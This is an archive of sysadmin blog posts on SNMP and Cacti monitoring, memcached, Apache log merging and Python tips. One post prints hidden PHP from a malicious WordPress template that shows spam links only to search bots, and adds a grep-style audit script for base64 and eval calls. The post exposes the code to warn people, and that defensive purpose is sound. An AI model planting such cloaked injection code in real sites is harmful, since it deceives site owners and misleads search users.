Netuality

Taming the big bad websites

Archive for the ‘Tools’ Category

Joke of the day: Amazon Cloud Drive app …


… which according to VentureBeat and various media outlets is a Dropbox competitor that “allows you to seamlessly drag and drop files from your computer to the cloud with little work”. Not!

Guess what, it’s about file synchronization. File. Synchronization. Fully-fledged two-way file syncing from all my laptops and devices to the cloud and back, not just “uploading a file to the cloud with little work”.

I guess the new SkyDrive and Google Drive tools are putting a lot of pressure on Amazon, but if this app is the answer then it’s a bad one. Come on, Amazon, you can do better!


Written by Adrian

May 5th, 2012 at 11:24 pm

Posted in Tools


Google: sorry, but Lisp/Ruby/Erlang not on the menu


Yes, language propaganda again. Ain’t it fun?

Here comes a nice quote from the latest Steve Yegge post (read the whole thing if you have the time – it’s both fun and educational, at least for me). So, there:

I made the famously, horribly, career-shatteringly bad mistake of trying to use Ruby at Google, for this project. And I became, very quickly, I mean almost overnight, the Most Hated Person At Google. And, uh, and I’d have arguments with people about it, and they’d be like Nooooooo, WHAT IF… And ultimately, you know, ultimately they actually convinced me that they were right, in the sense that there actually were a few things. There were some taxes that I was imposing on the systems people, where they were gonna have to have some maintenance issues that they wouldn’t have. [...] But, you know, Google’s all about getting stuff done.

[...]

Is it allowed at Google to use Lisp and other languages?

No. No, it’s not OK. At Google you can use C++, Java, Python, JavaScript… I actually found a legal loophole and used server-side JavaScript for a project.

Mmmmm … key?

Written by Adrian

May 29th, 2008 at 12:35 am

Posted in Tools


Java going down, Python way up, and more …


According to O’Reilly Radar, sales of Java books have declined by almost 50% in the last 4 years. C# is selling more books year over year and will probably draw level with Java in 2008. JavaScript is on the rise (due to AJAX, for sure) and PHP is on a surprising decline (although the job statistics indicate quite the contrary).


In 2007, the number of Ruby books sold was larger than the number of Python books sold. In their article they qualify Ruby as a “mid-major programming language” and Python as a “mid-minor” one. However, after the announcement of Google App Engine, the number of Python downloads from ActiveState tripled in May. This should become visible in the book sales statistics pretty soon.

Written by Adrian

May 24th, 2008 at 5:36 pm

Posted in Tools


Nasty WordPress template scam


Moving my blog to the WordPress platform, I wanted to install a template somewhat nicer than the default. This is how I discovered a potentially very harmful stunt some blackhats are pulling with free WordPress templates. What they do is build “template farms”: directories of hundreds or maybe thousands of templates. As these sites are very well optimized for search engines, they rank pretty high when an unsuspecting victim looks for free templates. Sometimes the victim just downloads a nice-looking template from a seemingly innocuous blog hosted on a free platform (wordpress.com, Blogger, etc.).

Do not install a WordPress template without performing at least a cursory security audit. Let me remind you that the view layer in WordPress is just another PHP script, with full power to do anything a PHP script can do on your server. This is what the template I downloaded contained, embedded in multiple source files (sidebar, archive, etc.):

if (strstr($_SERVER['HTTP_USER_AGENT'], base64_decode('Ym90'))) {
    echo base64_decode(
        'PGEgaHJlZj1cImh0dHA6Ly93d3cuYmVzdGZyZWVzY3JlZW5zYXZlci5jb21cIiBjbGFzcz1cInNw' .
        'YWNpbmctZml4XCI+RnJlZSBDZWxlYnJpdHkgU2NyZWVuc2F2ZXJzPC9hPjxhIGhyZWY9XCJodHRw' .
        'Oi8vd3d3LnNrb29ieS5jb21cIiBjbGFzcz1cInNwYWNpbmctZml4XCI+RnJlZSBPbmxpbmUgR2Ft' .
        'ZXM8L2E+');
}

Basically, this means that any User-Agent containing the word “bot” (thus, all the mainstream search engine bots/site crawlers) will see a couple of spammy links on every page of the blog. Obviously it could have been much worse: a template could just as easily reveal the database access credentials and other dangerous server details when a blackhat bot identified by a specially crafted User-Agent string scans the blog. The simplest form of audit one can do is to search the PHP source code for base64 and eval functions, as these are generally used to disguise malware; a minimal sketch of such an audit follows.
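Here is one way to script that cursory audit in Python; the theme path is a hypothetical example and the pattern list is deliberately crude, so expect false positives:

# audit_theme.py - flag suspicious calls commonly used to hide malware in themes
import os
import re

SUSPECT = re.compile(r'base64_decode|eval\s*\(|gzinflate|str_rot13')

def audit(theme_dir):
    for root, _dirs, files in os.walk(theme_dir):
        for name in files:
            if not name.endswith('.php'):
                continue
            path = os.path.join(root, name)
            with open(path) as f:
                for lineno, line in enumerate(f, 1):
                    if SUSPECT.search(line):
                        print('%s:%d: %s' % (path, lineno, line.strip()))

audit('/var/www/wp-content/themes/new-theme')   # hypothetical theme directory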

Written by Adrian

October 21st, 2007 at 5:15 pm

Posted in Tools


Programming is hard – the website


A newcomer in the world of “code snippets” sites is programmingishard.com. Although the site is a few months old, it has only recently started to gain steam. Unlike its competitors Krugle and Koders, this is not a code search engine but a snippet repository, entirely tag-based and user-built. The author has a blog at tentimesbetter.com.

To whet your appetite, here is a Python code fragment I found on the site, emulating the classic inline conditional which does not exist as such in Python:

n = ['no', 'yes'][thing == 1]

Obviously it has the big disadvantage of evaluating both values no matter what the condition thing is (see the sketch below), but it is very short and elegant. Simple but nice syntactic sugar.
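A minimal illustration of that disadvantage, with hypothetical helper functions: both list elements are computed before the indexing happens, so side effects and costly calls run regardless of the condition. (For the record, the x if cond else y conditional expression introduced in Python 2.5 evaluates only the chosen branch.)

# Both branches are evaluated before the indexing -- the pitfall of the trick.
def cheap():
    return 'no'

def expensive():
    print('expensive branch evaluated!')   # runs even when thing != 1
    return 'yes'

thing = 0
n = [cheap(), expensive()][thing == 1]     # prints the warning; n == 'no'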

Written by Adrian

August 2nd, 2006 at 11:07 pm

Posted in Tools


Monitoring memcached with cacti


Memcached is a clusterable cache server from Danga. Or, as they call it, a distributed memory object caching system. Well, whatever. Just note that memcached clients exist for lots of languages (Java, PHP, Python, Ruby, Perl) – the mainstream languages of the web world. A lighter version of the server was rewritten in Java by Mr. Jehiah Czebotar. Major websites such as Facebook, Slashdot, LiveJournal and Dealnews use memcached in order to scale to the huge load they’re serving. Recently, we needed to monitor the memcached servers of a high-performance web cluster serving the Planigo websites. By googling and reading the related newsgroups, I was able to find two solutions:

  • from faemalia.net, a script which is integrated with the MySQL server templates for Cacti. Uses the Perl client.
  • from dealnews.com, a dedicated memcached template for Cacti and some scripts based on the Python client. The installation is thoroughly described here.

These two solutions take the same approach: provide a specialized Cacti template whose charts are based on data extracted by executing memcached client scripts. Elegant, maybe, but it could become a pain in the dorsal area – futzing with Cacti templates was never my favorite pastime. Just try to import a template exported from a different version of Cacti and you’ll know what I mean.

In my opinion, there is a simpler way: install a memcached client on all the memcached servers, extract the statistical values with a script, and use the technique described in one of my previous posts to expose the script results as SNMP OID values. Then track these values in Cacti via the existing generic mechanism. This approach has the disadvantage of requiring a memcached client on every server, but it makes building your own charts and data source templates very simple, as for any generic SNMP data.

All you need now is a simple script which prints the memcached statistics, one per line. I will provide one-liners for Python, which will obviously work only on machines having Python and the “tummy” client installed. This is the recipe (the default location of the Python executable on Debian is /usr/bin/python, but YMMV):

1. First, use this one-liner as an snmpd exec:

/usr/bin/python -c "import memcache; print ('%s' % [memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1],]).replace(\"'\", '').replace(',', '\n').replace('[', '').replace(']', '').replace('{', '').replace('}', '')"

This will display the name of each memcached statistic along with its value, and will allow you to hand-pick the OIDs you want to track. Yes, I know it could be done more simply with translate instead of multiple replace calls – left as an exercise for the Python-aware reader.
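If you would rather skip the shell-quoting gymnastics, here is an equivalent standalone sketch under the same assumptions (the “tummy” python-memcached client installed, memcached listening on the default 127.0.0.1:11211):

#!/usr/bin/python
# Print each memcached statistic as "name value", one per line.
import memcache

stats = memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1]
for name in sorted(stats):
    print('%s %s' % (name, stats[name]))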

2. After you have the complete list of OIDs, use this one-liner:

/usr/bin/python -c "import memcache; print '##'.join(memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1].values()).replace('##', '\n')"

The memcached statistics will be displayed in the same order, but only their values, not their names.

And this is the mandatory eye candy:



Written by Adrian

August 2nd, 2006 at 10:54 pm

Posted in Tools


Monitoring Windows servers – with SNMP


UPDATE: Did you know there’s an official Cacti guide? Find it at Cacti 0.8 Beginner’s Guide. For more info about SNMP, don’t hesitate to take a look at Essential SNMP, Second Edition.

My previous article focused on Linux monitoring. Often, you’ll have at least a few Windows machines in your datacenter. SQL Server is one of the best excuses these days to get a Microsoft machine into your server room – and you know what, it’s a decent database, at least for medium-sized companies like the one I’m working for right now.

It is less well known, but yes, you can have SNMP support out of the box with Windows 2000 and XP – it doesn’t need to be the Server flavor [obviously it works the same in 2003 Server]:

  1. Invoke the Control Panel.
  2. Double click the Add/Remove Programs icon.
  3. Select Add/Remove Windows Components. The Windows Component Wizard is displayed.
  4. Check the Management and Monitoring Tools box.
  5. Click the Details button.
  6. Check the Simple Network Management Protocol box and click OK, then Next. You may have to reboot the machine.

After the service is installed, it has to be configured. Here’s how:

  1. Invoke the Control Panel.
  2. Double click the Administrative Tools icon.
  3. Double click the Services icon.
  4. Select SNMP Service.
  5. Choose the Security tab.
  6. Add whatever community name is used in your network. Chances are that on an internal LAN the default community, public, works out of the box.
  7. For a sensitive server, you may want to fiddle a little bit with the IP restriction settings, for instance allowing SNMP communication only with the monitoring machine.
  8. Click OK then restart the service.

The next step is Cacti integration. Unfortunately, there is no Windows-specific device profile in Cacti, so if you have lots of Windows machines you’ll have to define your own. Or take a Generic SNMP-enabled host and use it as a scaffold for each device configuration.

Out of the graphs and datasources already defined in Cacti [I am using 0.8.6c] only two work with Windows SNMP agents: processes and interface traffic values.

It’s a good start, but if you are serious about monitoring, you need to dig a little deeper. Once again, the MIB browser comes to save the day. It’s very simple: search the Windows machine for any .mib files you can find, copy them to your workstation, load them into the MIB browser and make some recursive walks (Get Subtree on the root of the MIB). This way, I was able to find some interesting OIDs for the Windows machine. For instance, .1.3.6.1.2.1.25.3.3.1.2.1 through .1.3.6.1.2.1.25.3.3.1.2.4 are the OIDs for CPU load on each of the 4 virtual CPUs [it’s a dual Xeon with HT].
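As an aside, here is a sketch of polling those per-CPU OIDs programmatically with the PySNMP library (mentioned at the end of the Linux article below); the host name and community here are placeholder assumptions:

# Poll hrProcessorLoad (.1.3.6.1.2.1.25.3.3.1.2.x) for the four virtual CPUs.
from pysnmp.hlapi import (SnmpEngine, CommunityData, UdpTransportTarget,
                          ContextData, ObjectType, ObjectIdentity, getCmd)

for cpu in range(1, 5):
    oid = '1.3.6.1.2.1.25.3.3.1.2.%d' % cpu
    err_ind, err_stat, err_idx, binds = next(getCmd(
        SnmpEngine(), CommunityData('public'),
        UdpTransportTarget(('windows-host', 161)), ContextData(),
        ObjectType(ObjectIdentity(oid))))
    if not err_ind and not err_stat:
        for name, value in binds:
            print('%s = %s%%' % (name, value))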

Memory-related OIDs for my configuration are listed below. In the hrStorage table, column .5 is hrStorageSize and column .6 is hrStorageUsed; the final index selects the storage entry and may differ on your machine:

  • .1.3.6.1.2.1.25.2.3.1.5.6 – Total physical memory
  • .1.3.6.1.2.1.25.2.3.1.6.6 – Used physical memory
  • the same .5.x and .6.x columns under the virtual-memory storage index – Total and used virtual memory [“virtual” = “swap” in Windows lingo]

Here’s a neat memory chart for a Windows machine. Notice that the values are in “blocks”, which in my case means 64 KB per block. The total physical memory is 4 GB.
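To double-check the units, here is a tiny sketch of the block-to-bytes conversion (the used-blocks figure is a hypothetical reading; the block size itself is reported by hrStorageAllocationUnits, .1.3.6.1.2.1.25.2.3.1.4.&lt;index&gt;):

# Convert hrStorage block counts to bytes: bytes = blocks * allocation unit.
ALLOCATION_UNIT = 64 * 1024   # 64 KB blocks, as reported on this machine
total_blocks = 65536          # 65536 blocks x 64 KB = 4 GB of physical RAM
used_blocks = 43210           # hypothetical hrStorageUsed reading

print('total: %d MB, used: %d MB' % (
    total_blocks * ALLOCATION_UNIT // 2**20,
    used_blocks * ALLOCATION_UNIT // 2**20))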

Most hardware manufacturers do offer SNMP agents for their hardware, as well as the corresponding .mib files. In my case, I was able to install an agent to monitor an LSI MegaRAID controller. Here is a chart of the number of disk operations per second:

In one of my next articles, we’ll take a look together at the way you can export “non-standard” data over SNMP from Windows, in the same manner we did on Linux, using custom scripts. Till then, have an excellent week.

Written by Adrian

May 12th, 2006 at 6:52 pm

Posted in Tools


Unicode in Python micro-recipe : from MySQL to webpage via Cheetah


Very easy:

  • start by adding the default-character-set=utf8 in your MySQL configuration file and restart the database server
  • apply this recipe from the ActiveState Python Cookbook (“guaranteed conversion to unicode or byte string”) – a sketch of the idea follows below
  • inside the Cheetah template, use the ReplaceNone filter:


#filter ReplaceNone
${myUnicodeString}
#end filter

in order to prevent escaping non-ASCII characters.
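For reference, the gist of that Cookbook recipe is a small coercion helper along these lines (a Python 2 sketch of the idea, not the verbatim recipe):

# Coerce any object to unicode, decoding byte strings as needed (Python 2).
def safe_unicode(obj, encoding='utf-8'):
    if isinstance(obj, unicode):
        return obj
    if isinstance(obj, str):
        return obj.decode(encoding, 'replace')
    return unicode(obj)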

Now. That’s better.

Written by Adrian

April 14th, 2006 at 11:42 pm

Posted in Tools


Monitor everything on your Linux servers – with SNMP and Cacti


UPDATE: Did you know there’s an official Cacti guide? Find it at Cacti 0.8 Beginner’s Guide. For more info about SNMP, don’t hesitate to take a look at Essential SNMP, Second Edition.

Two free open-source tools are running the show in network and server-activity monitoring. The oldest, and quite popular among network and system administrators, is Nagios. Nagios does not only do monitoring, but also event traps, escalation and notification. The younger challenger is called Cacti. Unlike Nagios, it’s written in a scripting language [PHP], so no compiling is necessary – it just runs out of the box [1]. Cacti’s problem is that, at its current version, it is missing lots of real-time features such as alerting and notification. All these features are scheduled for future versions of the product, but as with any open-source roadmap nothing is guaranteed. Anyway, this article focuses on Cacti because it’s what I am currently using.

Cacti is built upon the open-source graphing tool RRDtool and a communication protocol, SNMP. SNMP is not exactly a developer’s cup of tea, being more of a network administrator’s tool [2]. However, a monitoring server comes in extremely handy for performance measurement and tuning, especially for complex performance behavior which can only be benchmarked long-term: the impact of a large cache on a web application, say, or the performance of long-running operations.

But is the specific variable you need to monitor available with SNMP out of the box? There is a strong chance it is. SNMP being an extensible protocol, lots of organizations have registered their own MIBs and respective implementations. Basically, a MIB is a group of unique identifiers called OIDs. An OID is a sequence of numbers separated by dots, for instance ‘.1.3.6.1.4.1.2021.11′; each number has a special meaning in a standard object tree – in this example, ‘.1.3.6.1.4.1.2021.11′ means ‘.iso.org.dod.internet.private.enterprises.ucdavis.systemStats’. You can even have your own MIB in the ‘.iso.org.dod.internet.private.enterprises’ tree, by applying on this page at IANA.

Most probably you don’t really need your own MIB, no matter how ‘exotic’ your monitoring is, because:

a) it’s already there, in the huge list of existing MIBs and implementations

and

b) you are not bound to the existing official MIBs; in fact you can create your own MIB as long as you replicate it in the SNMP configuration on all the servers that you want to monitor.

To take a look at existing MIBs, free tools are available on the net, IMHO the best one being MibBrowser. This multiplatform [Java] MIB browser has a free version which should be more than enough for our basic task. The screen capture shown here depicts a “Get Subtree” operation on the ‘.1.3.6.1.4.1.2021.11′ MIB; the result is a list of single-value OIDs, such as ‘.1.3.6.1.4.1.2021.11.11.0′, which has the alias ‘ssCpuIdle.0′ and value 97 [meaning that the CPU is 97% idle]. You can see the alias by loading the corresponding MIB file [select File/Load MIB, then choose 'UCD-SNMP-MIB.txt' from the list of predefined MIBs].

From the command line, in order to display existing MIB values, you can use snmpwalk:

snmpwalk -Os -c [community_name] -v 1 [hostname] .1.3.6.1.4.1.2021.11 [3]

and the result is:
UCD-SNMP-MIB::ssIndex.0 = INTEGER: 1
UCD-SNMP-MIB::ssErrorName.0 = STRING: systemStats
UCD-SNMP-MIB::ssSwapIn.0 = INTEGER: 0
UCD-SNMP-MIB::ssSwapOut.0 = INTEGER: 0
UCD-SNMP-MIB::ssIOSent.0 = INTEGER: 4
UCD-SNMP-MIB::ssIOReceive.0 = INTEGER: 2
UCD-SNMP-MIB::ssSysInterrupts.0 = INTEGER: 4
UCD-SNMP-MIB::ssSysContext.0 = INTEGER: 1
UCD-SNMP-MIB::ssCpuUser.0 = INTEGER: 2
UCD-SNMP-MIB::ssCpuSystem.0 = INTEGER: 1
UCD-SNMP-MIB::ssCpuIdle.0 = INTEGER: 96
UCD-SNMP-MIB::ssCpuRawUser.0 = Counter32: 17096084
UCD-SNMP-MIB::ssCpuRawNice.0 = Counter32: 24079
UCD-SNMP-MIB::ssCpuRawSystem.0 = Counter32: 6778580
UCD-SNMP-MIB::ssCpuRawIdle.0 = Counter32: 599169454
UCD-SNMP-MIB::ssCpuRawKernel.0 = Counter32: 6778580
UCD-SNMP-MIB::ssIORawSent.0 = Counter32: 998257634
UCD-SNMP-MIB::ssIORawReceived.0 = Counter32: 799700984
UCD-SNMP-MIB::ssRawInterrupts.0 = Counter32: 711143737
UCD-SNMP-MIB::ssRawContexts.0 = Counter32: 1163331309
UCD-SNMP-MIB::ssRawSwapIn.0 = Counter32: 23015
UCD-SNMP-MIB::ssRawSwapOut.0 = Counter32: 13730

Each of these values has its own significance; ‘ssCpuIdle.0′, for instance, announces that the CPU is 96% idle. In order to retrieve just a single value from the list, use its alias as a parameter to the snmpget command, for instance:

snmpget -Os -c [community_name] -v 1 [hostname] UCD-SNMP-MIB::ssCpuIdle.0

Sometimes you want to monitor something which you do not seem to find in the list of MIBs. Say, for instance, the performance of a MySQL database that you’re pounding pretty hard with your webapp [4]. The easiest way of doing this is to go through a script – SNMP implementations can take the result of any script and expose it through the protocol, line by line.

Supposing you want to keep track of the values obtained with the following script:

#!/bin/sh
/usr/bin/mysqladmin -uroot status | /usr/bin/awk '{printf("%f\n%d\n%d\n", $4/10, $6/1000, $9)}'

The mysqladmin command and a bit of simple awk magic display the following three values, each on a separate line (a Python sketch of the same extraction follows the list):

  • number of opened connections / 10
  • number of queries / 1000
  • number of slow queries
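For the curious, here is the same extraction sketched in Python, assuming the usual single-line `mysqladmin status` output; integer division mirrors awk’s %d:

# Equivalent of the awk one-liner above. Expected input looks like:
#   Uptime: 1234  Threads: 5  Questions: 6789  Slow queries: 3  ...
import subprocess

fields = subprocess.check_output(
    ['/usr/bin/mysqladmin', '-uroot', 'status']).decode().split()

print(float(fields[3]) / 10)     # opened connections / 10   (awk $4/10)
print(int(fields[5]) // 1000)    # queries / 1000            (awk $6/1000)
print(int(fields[8]))            # slow queries              (awk $9)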

It is interesting to note that, while the first value is an instantaneous, gauge-like reading, the following two are incremental, growing as long as new queries and new slow queries are recorded. Keep this in mind for later, when we track these values.

But for now, let’s see how these three values are exposed through SNMP. The first step is to tell the SNMP daemon that the script has an associated MIB. This is done in the configuration file, usually located at /etc/snmp/snmpd.conf. The following line attaches the execution of the script [for example /home/user/myscript.sh] to a certain OID:

exec .1.3.6.1.4.1.111111.1 MySQLParameters /home/user/myscript.sh

The ‘.1.3.6.1.4.1.111111.1′ OID is a branch of ‘.1.3.6.1.4.1′ [meaning '.iso.org.dod.internet.private.enterprises']. We tried to make it look ‘legitimate’, but obviously you can use any sequence you want here.

After restarting the daemon, let’s interrogate the freshly created OID (see the following image for the MibBrowser view, or run snmpwalk -Os -c [community_name] -v 1 [hostname] .1.3.6.1.4.1.111111.1 from the command line); the result is:

enterprises.111111.1.1.1 = INTEGER: 1
enterprises.111111.1.2.1 = STRING: "MySQLParameters"
enterprises.111111.1.3.1 = STRING: "/etc/snmp/mysql_params.sh"
enterprises.111111.1.100.1 = INTEGER: 0
enterprises.111111.1.101.1 = STRING: "0.900000"
enterprises.111111.1.101.2 = STRING: "18551"
enterprises.111111.1.101.3 = STRING: "108"
enterprises.111111.1.102.1 = INTEGER: 0
enterprises.111111.1.103.1 = ""

Great! Now we have proof that it really works: our specific values, extracted with a custom script, are visible through SNMP. Note that the three script outputs land at enterprises.111111.1.101.1 through .101.3 – those are the OIDs to track. Let’s go back to Cacti and see how we can make some nice charts out of them [5].

Cacti has this nice feature of defining ‘templates’ that you can reuse afterwards. My strategy is to define a data template for each one of the 3 parameters I want to chart, using the ‘Duplicate’ function applied to the ‘SNMP – Generic OID Template’.

On the duplicated datasource template, you have to change the datasource title, the name to display in charts, the data source type [use DERIVE for incremental counters and GAUGE for instantaneous values], the specific OID and the SNMP community. Do it for all three values.

Using the three new datasource templates, create a chart template for ‘MySQL Activity’. That’s a bit more complicated, but it boils down to the following procedure, repeated for each of the 3 data sources:

  • add a data source and associate a graph [I always use AREA for the first graph as a background and LINE3 for the other, but it's just a matter of taste]
  • associate labels with current or computed values: CURRENT, AVERAGE, MAX in this example

All the rest is really fine-tuning – deciding on better colors, whether to use autoscale or a fixed scale, and so on. By now, your graph template should be ready to use.

Note that for the incremental values ['DERIVE' type data sources] I’ve used titles such as ‘Thousands of queries/5 min’ – the 5 minutes come from the Cacti poller, which is set to query for data every 5 minutes. The end result is something like this:

On this real production chart you’ll see a few interesting patterns. For instance, at 3 o’clock in the morning there is a huge spike in all the charted parameters – indeed, a cron’ed script was provoking it. From time to time, a small burst of slow queries is recorded – still under investigation. What is interesting is that these spikes were previously undetectable on the load average chart, which looks clean and innocuous:

To conclude, SNMP is a valuable resource for server performance monitoring. Often, investigating specific parameters and displaying them in tools such as Cacti can bring interesting insights upon the behavior of servers.

Some SNMP implementations in different programming languages:

  • Java: Westhawk’s Java SNMP stack [free, with commercial support], AdventNet SNMP API [commercial, with a feature-restricted non-expiring free version], iREASONING SNMP API [commercial implementation], SNMP4J [free and feature-rich implementation – thank you, Mathias, for the tip]
  • PHP: client-only supported by the php-snmp extension, part of the PHP distribution [free]
  • Python: PySNMP is a Python SNMP framework, client+agents [free].
  • Ruby: client-only implementation Ruby SNMP [free]

[1] If you’re running Debian, Cacti comes with apt, so it’s a breeze to install and run [apt-get install cacti].

[2] A bit out of the scope of this article: SNMP also allows writing values on remote servers, not only retrieving monitored values.

[3] Replace [hostname] with the server hostname and [community_name] with the SNMP community – the default being ‘public’. The SNMP community is a way of authenticating a client to an SNMP server; although the system can be used for pretty sophisticated stuff, most of the time servers have a read-only, passwordless community, visible only on the internal network for monitoring purposes.

[4] In fact, a commercial implementation of SNMP for MySQL does exist.

[5] The procedure described here applies to Cacti v0.8.6c.

Written by Adrian

March 5th, 2006 at 5:27 pm

Posted in Tools


Aggregating webservers logs for an Apache cluster


One of the ways of scaling a heavy-traffic LAMP web application is to transform the server into a cluster of servers. Some may opt for the easy path of an overpriced appliance load balancer, but the most daring [and budget-constrained] will go for free software solutions such as pound or haproxy.

Although excellent performers, these free balancers lack lots of features found in their commercial counterparts. One of the most embarrassing misses is the lack of flexibility in producing decent access logs. Both pound (LogLevel 4) and haproxy (option httplog) can generate Apache-like logs in their logfiles or the syslog, but neither offers the level of customization encountered in Apache. Basically, you're left with using the logs from the cluster nodes. These logs present a couple of problems:

  • the originating IP is always the internal IP of the balancer
  • there is one log per node, while log analysis tools usually expect a single log file per report

The first problem is relatively easy to solve. Start by activating the X-Forwarded-For header in the balancing software, for instance by configuring haproxy with option forwardfor. A relatively unknown Apache module called mod_rpaf will then solve the tedious task of extracting the remote IP from the X-Forwarded-For header and copying it into the remote address field of the Apache logs. For Debian Linux fans, it's nice to note that libapache-mod-rpaf is available via apt.

Now that you have N realistic Apache weblogs, one per cluster node, you just have to concatenate them and put them into a form understandable by your log analysis tools. Simply cat-ing them into a big file won't cut it [arf], because new records will appear in different regions of the file instead of appending chronologically at its tail. The easiest solution is to sort these logs. Although I am aware of the vague possibility of sorting on the Apache datetime field, even taking the locale into account, I confess my profound inability to find the right combination of parameters. Instead, I chose to add a custom field to the Apache log, using the following log format:


LogFormat "%h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{Cookie}i" %c %T "%{%Y%m%d%H%M%S}t"" combined

where %{%Y%m%d%H%M%S}t is a standard projection of the current datetime onto an easily sortable integer, for instance 20050925120000 – the equivalent of 25 Sep 2005 12:00:00. Now, taking the quote as field separator in the Apache log format, it is easy to sort on this custom field [the 10th]:

sort -b -t '"' -T /opt -k 10 /logpath/access?.log > /logpath/full.log

And there you are, with a nice huge log file to munch on. On a standard P4 with 1 GB of RAM it takes less than a minute to produce a 2 GB log file…
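If the flat sort ever becomes the bottleneck, a k-way chronological merge is a natural alternative; here is a sketch in Python, with hypothetical paths, assuming the sortable timestamp is the 10th quote-delimited field as above (each per-node log is already in chronological order, which is all heapq.merge needs):

# Merge per-node Apache logs chronologically on the custom timestamp field.
import heapq

def timestamp(line):
    return line.split('"')[9]    # 10th quote-delimited field (0-based index 9)

logs = [open('/logpath/access%d.log' % i) for i in (1, 2, 3)]
with open('/logpath/full.log', 'w') as out:
    for line in heapq.merge(*logs, key=timestamp):
        out.write(line)
for f in logs:
    f.close()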

In case the web traffic is really big and the log analysis process impacts existing web activity, use a separate machine instead of overloading one of the cluster nodes. For automated transfer of log files, generate ssh keys on all the cluster nodes for passwordless login from the web analytics server into the web logfiles' owner account. Minimize traffic between these machines by installing rsync on them and then using rsync over ssh:

rsync -e ssh -Cavz www-data@node1:/var/log/apache/access.log /logpath/access1.log

Now you know all the steps required to fully automate the log aggregation and processing. One may ask why all the fuss, when a simple subscription to an ASP-style web analytics provider should suffice. True, however… the cluster I've recently configured with this procedure serves a few million hits per week – and yes, we're talking about page hits. At this level of traffic, the cost of a web analytics service starts at $10,000/year. That's certainly a nice amount of money, which would allow you to buy your own analytics tool [such as, for instance, Urchin v5] and still keep some cash from the first year. Some might say that these commercial tools have their own load balancer analysis techniques. Sure, but it all comes at a cost. In the case of Urchin, you just saved $695/node – plus some bragging rights with your mates. Relax and enjoy.

PS: Yes, we're talking about a multi-million-page-hit LAMP solution, not J2EE… Maybe I'll get into details on another occasion, assuming somebody is interested. Leave a comment, send a mail or something.

Written by Adrian

September 25th, 2005 at 8:20 pm

Posted in Tools
